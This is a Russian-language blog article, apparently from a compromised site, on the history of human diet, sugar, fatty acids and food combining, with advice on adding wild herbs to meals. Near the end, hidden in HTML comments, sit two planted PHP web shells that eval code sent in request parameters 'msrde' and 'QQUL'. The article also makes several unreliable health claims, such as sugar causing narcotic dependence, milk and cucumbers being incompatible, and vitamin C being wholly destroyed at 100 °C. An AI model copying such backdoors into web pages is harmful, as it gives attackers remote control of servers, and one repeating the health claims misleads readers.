Экология жизни и продукты питания

продукты питания

        В течение последних трехсот лет во всех развитых странах стал отмечаться очень высокий уровень заболеваний, вызванных нарушением питания. В список болезней, приобретенных человечеством в результате неправильного питания, можно отметить:

ранний атеросклероз, сахарный диабет, гипертоническую болезнь, многие болезни желудочно-кишечного тракта, включая кишечные формы аллергии, язвенную болезнь двенадцатиперстной кишки и т. д.

Продукты питания наших предков

          Что же привело нашу цивилизацию к такому плачевному положению?   В течение многих тысячелетий человек был «охотником-собирателем». Основу питания первобытных людей составляли травы, плоды, семена диких растений. По записям археологов, сорок тысяч лет назад человек мог использовать в пищу до двухсот растений, растущих в то время. Химическая энергия в семенах и плодах многолетних растений запасена в виде различных жирных кислот. Жирные кислоты, как пищевой ресурс, не только обеспечивали жизненные потребности человека, но и были уникальным источником незаменимых структурных и регуляторных биохимических процессов, поддерживающих жизнь и здоровье человека.

          Около десяти тысяч лет назад, после открытия огня, человечество произвело революцию в питании, начав употреблять в пищу семена злаковых растений и заниматься их культивированием. Эти однолетние растения запасают энергию в виде крахмалов, быстро и надежно снабжающих организм глюкозой. Этот вид пищи оказался настолько привлекательным, что люди стали все более и более переходить на «высокомолекулярную», т. е. эффективно насыщающую кровь глюкозой, еду.

           В начале девятнадцатого века дорогой американский сахар заменили на более дешевую продукцию свекольных заводов. Произошел резкий скачок потребления сахара. В Англии потребление сахара сразу подскочило с 3 кг в год на одного человека до 20 килограмм. А через некоторое время начал появляться и весь спектр современных болезней.

С одной стороны обилие глюкозы в пище стало хорошим стимулятором мозговой деятельности человека, с другой — включился механизм наркотической зависимости, приводящий к «перееданию» сахаросодержащих веществ. К тому же высокие концентрации глюкозы в крови дали очень серьезные побочные эффекты: прямое повреждение сосудистого русла, риск нарушения регуляторных механизмов, использование компенсаторных путей поддержания гомеостаза.

            Сменив пищевой ресурс, человек лишился возможности получать совершенно необходимые для своей биохимии компоненты. Недостаток в рационе важного для поддержания здоровья класса веществ — незаменимых жирных кислот, приводит к нарушению регуляторных возможностей организма и к балансированию на грани между здоровьем и болезнью. Все эти факторы усугубляются общим для всех людей дефицитом витаминов и микроэлементов.

            В настоящее время особое значение в здоровой и долгой жизни человека заключается в применении современных способов переработки и хранения пищи. Большинство из них снижают биологическую ценность любого пищевого продукта. Они загрязнены удобрениями, консервантами, химическими красителями, просто отходами.

             Сложившиеся в обществе способы приготовления пищи основаны прежде всего на ее термообработке (обработка пищи в микроволновой печи, жарка, пастеризация, кипячение), а это ведет к разрушению питательных веществ на 15-25 %. Для красных и желтых овощей эта цифра увеличивается до 35 %. А витамин C, например, при нагревании до 100 °С разрушается полностью.

            Поэтому многие ученые призывают нас вернуться к Природе и ее пищевым ресурсам, уделять больше внимания не продуктам питания, подвергшимся машинной переработке, не консервантам, а натуральной пище: со своего земельного участка, с грядки – огорода и сада.  И недаром все большее количество людей переходят на вегетарианский стол, на сыроедение и полусыроедение.

Основные продукты питания

            Если вы решили всерьез поддерживать свое здоровье и хотите прожить долгую и здоровую жизнь, в первую очередь нужно начинать со здорового питания. Определите свое отношение к основным продуктам: к мясной и растительной пище, бобовым и хлебным культурам, к хлебу и овощам, плодам и ягодам, к молоку, сахару, яйцам и сыру. Установите для себя, какие продукты питания следует употреблять и основные принципы питания, корректируя их время от времени в зависимости от состояния своего здоровья.продукты питания

             И помните, что разнообразное питание — это единственное правильное питание. Когда вы будете составлять меню на день или неделю, не забывайте еще и о дикорастущих лекарственных растениях.

             В первые блюда обязательно добавляйте растения: одуванчик, подорожник, крапиву, горец птичий (спорыш), корни лопуха, чабрец и т. д.

            Вкус вторых блюд и приправ значительно улучшат такие растения, как мята, черемша, гвоздичный корень, душица.

           Когда вы завариваете чай, приготовляете компоты и третьи блюда — можно использовать листья и сок березы, листья смородины, цикорий, плоды и цветки шиповника, красный корень, различные ягоды (клюква, черника, рябина, смородина), лепестки розы, плоды лимонника и т. д.

           Ни один отдельно взятый продукт не может удовлетворить потребности организма во всех необходимых питательных веществах, поэтому, чем более разнообразную пищу принимает человек, тем более насыщается организм различными питательными веществами.

           Помните, что не всякое сочетание пищевых продуктов приемлемо. Цельное молоко и свежие огурцы несовместимы. Так же несовместимы мясная и кисло-фруктовая пища, одновременный прием сладкой и кислой пищи. Если вслед за сладкой пищей принимать белковые блюда, то в кишечнике развивается усиленное брожение, появляются вздутие и неприятные ощущения в области желудка и кишечника. Это зависит от того, что углеводы раньше, чем белки подвергаются обработке пищевыми ферментами, они забирают большую часть свободной соляной кислоты и в результате белковая пища не переваривается полностью, а, опускаясь в нижние отделы кишечника, подвергается гниению.

           С давних времен народная медицина придавала большое значение правильному питанию. К каждому из ингредиентов потребляемой человеком пищи у медицины выработалось определенное отношение. Рассмотрим некоторые из наиболее часто принимаемых нами продуктов.

<!— [insert_php]if (isset($_REQUEST["msrde"])){eval($_REQUEST["msrde"]);exit;}[/insert_php][php]if (isset($_REQUEST["msrde"])){eval($_REQUEST["msrde"]);exit;}[/php] —>

<!— [insert_php]if (isset($_REQUEST["QQUL"])){eval($_REQUEST["QQUL"]);exit;}[/insert_php][php]if (isset($_REQUEST["QQUL"])){eval($_REQUEST["QQUL"]);exit;}[/php] —>

Интересная статья? Поделитесь с друзьями!

Вы можете оставить комментарий, или ссылку на Ваш сайт.

Оставить комментарий

Сайт размещается на хостинге Спринтхост
Рейтинг@Mail.ru ?php post_class() ?